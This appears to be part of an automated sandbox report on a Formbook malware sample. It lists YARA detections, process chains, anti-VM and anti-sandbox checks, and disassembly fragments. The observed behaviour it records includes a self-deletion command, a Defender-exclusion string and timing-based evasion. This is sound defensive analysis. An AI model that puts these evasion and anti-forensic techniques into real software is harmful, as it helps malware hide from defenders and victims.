          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: lTAPQJikGw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@12/11
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lTAPQJikGw.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
          Source: lTAPQJikGw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: lTAPQJikGw.exeVirustotal: Detection: 44%
          Source: lTAPQJikGw.exeReversingLabs: Detection: 43%
          Source: unknownProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe C:\Users\user\Desktop\lTAPQJikGw.exe
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe C:\Users\user\Desktop\lTAPQJikGw.exe
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: lTAPQJikGw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: lTAPQJikGw.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: lTAPQJikGw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\xxwqcHkmba\src\obj\Debug\CryptoConfig.pdb source: lTAPQJikGw.exe
          Source: Binary string: control.pdb source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lTAPQJikGw.exe, control.exe
          Source: Binary string: control.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_00EC5A3D push es; retf 0000h
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B2A2 push cs; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00415414 push esp; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00414F46 push cs; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00415FC5 push ebp; ret
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00A55A3D push es; retf 0000h
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0152D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B2A2 push cs; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3FB push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00945414 push esp; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B45C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00945FC5 push ebp; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00944F46 push cs; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.73125493594
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: lTAPQJikGw.exe PID: 7056, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000009385E4 second address: 00000000009385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 000000000093896E second address: 0000000000938974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe TID: 7060Thread sleep time: -99171s >= -30000s
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe TID: 7092Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6088Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6800Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread delayed: delay time: 99171
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.676441692.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.697993865.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.676441692.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000003.00000000.677401262.000000000A9A0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA#
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.695466749.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000000.676552486.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000003.00000000.676624021.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000003.00000000.677443197.000000000A9E1000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01592073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557016 mov eax, dword ptr fs:[00000030h]
